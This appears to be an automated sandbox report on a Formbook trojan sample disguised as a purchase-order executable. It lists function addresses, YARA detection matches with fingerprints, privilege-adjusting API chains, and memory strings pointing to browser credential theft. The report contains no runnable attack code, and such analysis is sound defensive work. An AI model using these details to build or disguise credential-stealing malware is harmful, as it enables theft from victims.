Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E8F0 | 2_2_0396E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394A840 | 2_2_0394A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03942840 | 2_2_03942840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BEFA0 | 2_2_039BEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03932FC8 | 2_2_03932FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394CFE0 | 2_2_0394CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03960F30 | 2_2_03960F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E2F30 | 2_2_039E2F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03982F28 | 2_2_03982F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B4F40 | 2_2_039B4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952E90 | 2_2_03952E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FCE93 | 2_2_039FCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FEEDB | 2_2_039FEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393AE0D | 2_2_0393AE0D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FEE26 | 2_2_039FEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940E59 | 2_2_03940E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03958DBF | 2_2_03958DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DCD1F | 2_2_039DCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394AD00 | 2_2_0394AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0CB5 | 2_2_039E0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930CF2 | 2_2_03930CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940C00 | 2_2_03940C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0398739A | 2_2_0398739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F132D | 2_2_039F132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392D34C | 2_2_0392D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039452A0 | 2_2_039452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395B2C0 | 2_2_0395B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E12ED | 2_2_039E12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394B1B0 | 2_2_0394B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0B16B | 2_2_03A0B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392F172 | 2_2_0392F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397516C | 2_2_0397516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EF0CC | 2_2_039EF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039470C0 | 2_2_039470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F70E9 | 2_2_039F70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF0E0 | 2_2_039FF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF7B0 | 2_2_039FF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F16CC | 2_2_039F16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03985630 | 2_2_03985630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DD5B0 | 2_2_039DD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A095C3 | 2_2_03A095C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7571 | 2_2_039F7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF43F | 2_2_039FF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03931460 | 2_2_03931460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395FB80 | 2_2_0395FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B5BF0 | 2_2_039B5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397DBF9 | 2_2_0397DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFB76 | 2_2_039FFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DDAAC | 2_2_039DDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03985AA0 | 2_2_03985AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E1AA3 | 2_2_039E1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EDAC6 | 2_2_039EDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFA49 | 2_2_039FFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7A46 | 2_2_039F7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B3A6C | 2_2_039B3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D5910 | 2_2_039D5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03949950 | 2_2_03949950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395B950 | 2_2_0395B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039438E0 | 2_2_039438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AD800 | 2_2_039AD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03941F92 | 2_2_03941F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFFB1 | 2_2_039FFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03903FD2 | 2_2_03903FD2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03903FD5 | 2_2_03903FD5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFF09 | 2_2_039FFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03949EB0 | 2_2_03949EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395FDC0 | 2_2_0395FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F1D5A | 2_2_039F1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03943D40 | 2_2_03943D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7D73 | 2_2_039F7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFCF2 | 2_2_039FFCF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B9C32 | 2_2_039B9C32
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B403E6 | 5_2_03B403E6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A8E3F0 | 5_2_03A8E3F0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3A352 | 5_2_03B3A352
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B002C0 | 5_2_03B002C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B20274 | 5_2_03B20274
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B341A2 | 5_2_03B341A2
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B401AA | 5_2_03B401AA
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B381CC | 5_2_03B381CC
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A70100 | 5_2_03A70100
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B1A118 | 5_2_03B1A118
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B08158 | 5_2_03B08158
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B12000 | 5_2_03B12000
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A7C7C0 | 5_2_03A7C7C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A80770 | 5_2_03A80770
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AA4750 | 5_2_03AA4750
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A9C6E0 | 5_2_03A9C6E0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B40591 | 5_2_03B40591
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A80535 | 5_2_03A80535
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B2E4F6 | 5_2_03B2E4F6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B24420 | 5_2_03B24420
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B32446 | 5_2_03B32446
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B36BD7 | 5_2_03B36BD7
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3AB40 | 5_2_03B3AB40
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A7EA80 | 5_2_03A7EA80
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A829A0 | 5_2_03A829A0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B4A9A6 | 5_2_03B4A9A6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A96962 | 5_2_03A96962
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A668B8 | 5_2_03A668B8
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AAE8F0 | 5_2_03AAE8F0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A8A840 | 5_2_03A8A840
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A82840 | 5_2_03A82840
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AFEFA0 | 5_2_03AFEFA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A8CFE0 | 5_2_03A8CFE0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A72FC8 | 5_2_03A72FC8
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B22F30 | 5_2_03B22F30
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AC2F28 | 5_2_03AC2F28
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AA0F30 | 5_2_03AA0F30
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AF4F40 | 5_2_03AF4F40
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3CE93 | 5_2_03B3CE93
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A92E90 | 5_2_03A92E90
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3EEDB | 5_2_03B3EEDB
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3EE26 | 5_2_03B3EE26
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A80E59 | 5_2_03A80E59
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A98DBF | 5_2_03A98DBF
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A7ADE0 | 5_2_03A7ADE0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A8AD00 | 5_2_03A8AD00
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B1CD1F | 5_2_03B1CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B20CB5 | 5_2_03B20CB5
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A70CF2 | 5_2_03A70CF2
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A80C00 | 5_2_03A80C00
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AC739A | 5_2_03AC739A
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3132D | 5_2_03B3132D
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A6D34C | 5_2_03A6D34C
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A852A0 | 5_2_03A852A0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B212ED | 5_2_03B212ED
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A9B2C0 | 5_2_03A9B2C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A8B1B0 | 5_2_03A8B1B0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB516C | 5_2_03AB516C
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A6F172 | 5_2_03A6F172
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B4B16B | 5_2_03B4B16B
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3F0E0 | 5_2_03B3F0E0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B370E9 | 5_2_03B370E9
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A870C0 | 5_2_03A870C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B2F0CC | 5_2_03B2F0CC
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3F7B0 | 5_2_03B3F7B0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B316CC | 5_2_03B316CC
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B1D5B0 | 5_2_03B1D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B37571 | 5_2_03B37571
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3F43F | 5_2_03B3F43F
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A71460 | 5_2_03A71460
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A9FB80 | 5_2_03A9FB80
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03ABDBF9 | 5_2_03ABDBF9
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AF5BF0 | 5_2_03AF5BF0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3FB76 | 5_2_03B3FB76
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AC5AA0 | 5_2_03AC5AA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B21AA3 | 5_2_03B21AA3
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B1DAAC | 5_2_03B1DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B2DAC6 | 5_2_03B2DAC6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AF3A6C | 5_2_03AF3A6C
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B37A46 | 5_2_03B37A46
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3FA49 | 5_2_03B3FA49
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B15910 | 5_2_03B15910
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A89950 | 5_2_03A89950
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A9B950 | 5_2_03A9B950
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A838E0 | 5_2_03A838E0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AED800 | 5_2_03AED800
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3FFB1 | 5_2_03B3FFB1
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A81F92 | 5_2_03A81F92
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3FF09 | 5_2_03B3FF09
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A89EB0 | 5_2_03A89EB0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A9FDC0 | 5_2_03A9FDC0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B37D73 | 5_2_03B37D73
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A83D40 | 5_2_03A83D40
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B31D5A | 5_2_03B31D5A
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03B3FCF2 | 5_2_03B3FCF2
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AF9C32 | 5_2_03AF9C32
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03301A30 | 5_2_03301A30
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_032FCB80 | 5_2_032FCB80
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_032FC960 | 5_2_032FC960
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_032FC959 | 5_2_032FC959
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_032FAC00 | 5_2_032FAC00
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03303259 | 5_2_03303259
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_033032A0 | 5_2_033032A0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0330329B | 5_2_0330329B
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_033050B0 | 5_2_033050B0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0331B5F0 | 5_2_0331B5F0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0393E338 | 5_2_0393E338
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0393E7EC | 5_2_0393E7EC
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0393E453 | 5_2_0393E453
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0393CB03 | 5_2_0393CB03
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0393CAAB | 5_2_0393CAAB
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0393D858 | 5_2_0393D858
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0392B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03975130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03987E54 appears 111 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 03AC7E54 appears 102 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 03AEEA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 03A6B970 appears 277 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 03AFF290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 03AB5130 appears 58 times
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: String function: 00445AE0 appears 65 times
Source: PO# Q919240.exe, 00000000.00000003.1454885763.000000000471D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO# Q919240.exe
Source: PO# Q919240.exe, 00000000.00000003.1455742376.0000000004713000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO# Q919240.exe
Source: PO# Q919240.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@8/6
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\PO# Q919240.exeFile created: C:\Users\user~1\AppData\Local\Temp\cuniliJump to behavior
            Source: PO# Q919240.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO# Q919240.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000005.00000003.1955661275.0000000003677000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2706051266.0000000003677000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1955481368.0000000003652000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2706051266.00000000036A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO# Q919240.exeReversingLabs: Detection: 71%
            Source: PO# Q919240.exeVirustotal: Detection: 73%
            Source: C:\Users\user\Desktop\PO# Q919240.exeFile read: C:\Users\user\Desktop\PO# Q919240.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PO# Q919240.exe "C:\Users\user\Desktop\PO# Q919240.exe"
